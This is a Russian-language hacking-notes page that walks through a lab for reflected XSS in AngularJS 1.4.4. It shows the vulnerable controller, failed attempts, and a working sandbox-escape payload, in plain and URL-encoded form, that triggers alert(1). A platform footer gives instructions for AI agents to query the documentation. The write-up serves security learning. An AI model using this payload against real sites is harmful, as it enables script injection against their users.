> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/web/xss/angularjs-sandbox-escape-without-strings.md).

# Побег из песочницы AngularJS без строк

### Отражённый XSS с побегом из песочницы AngularJS без строк

Отражённый XSS в AngularJS **1.4.4** — выйти из песочницы и выполнить `alert(1)` без `$eval` или строковых литералов.

<figure><img src="/files/a70f987b2b0ff66a4e6de2b5d29985c16a1fd19b" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/92afb9f439059a8616afab037d1c98e967b43ca5" alt=""><figcaption></figcaption></figure>

**Наблюдаемый код**

```javascript
angular.module('labApp', []).controller('vulnCtrl',function($scope, $parse) {
                            $scope.query = {};
                            var key = 'search';
                            $scope.query[key] = 'test';
                            $scope.value = $parse(key)($scope.query);
                        });
```

**Попытки**

* Проверка строки / $eval (не работает): / `{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}`
* Разбор можно нарушить, внедрив через строку запроса с `&`:/ `&7+ 7` → `&7%2b7`

<figure><img src="/files/f83a87f031659eda86e671f060120f1704c8c909" alt=""><figcaption></figcaption></figure>

Динамически собрать `alert(1)` через `toString().constructor.fromCharCode(...)` и принудить вычисление фильтра (`orderBy`):

<figure><img src="/files/ded455958c23111881a617724096b123ca63e1e5" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```javascript
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
```

{% endcode %}

" Этот фрагмент нарушает разбор и в hex/ASCII порождает `alert(0)` строку.

**Полезная нагрузка (URL-кодированная, предоставлена)**

{% code overflow="wrap" %}

```javascript
%74%6f%53%74%72%69%6e%67%28%29%2e%63%6f%6e%73%74%72%75%63%74%6f%72%2e%70%72%6f%74%6f%74%79%70%65%2e%63%68%61%72%41%74%3d%5b%5d%2e%6a%6f%69%6e%3b%20%5b%31%2c%32%5d%7c%6f%72%64%65%72%42%79%3a%74%6f%53%74%72%69%6e%67%28%29%2e%63%6f%6e%73%74%72%75%63%74%6f%72%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%32%30%2c%36%31%2c%39%37%2c%31%30%38%2c%31%30%31%2c%31%31%34%2c%31%31%36%2c%34%30%2c%34%39%2c%34%31%29
```

{% endcode %}

<figure><img src="/files/d88c7af158858eeef2bae97648b6886600930c41" alt="" width="366"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/web/xss/angularjs-sandbox-escape-without-strings.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
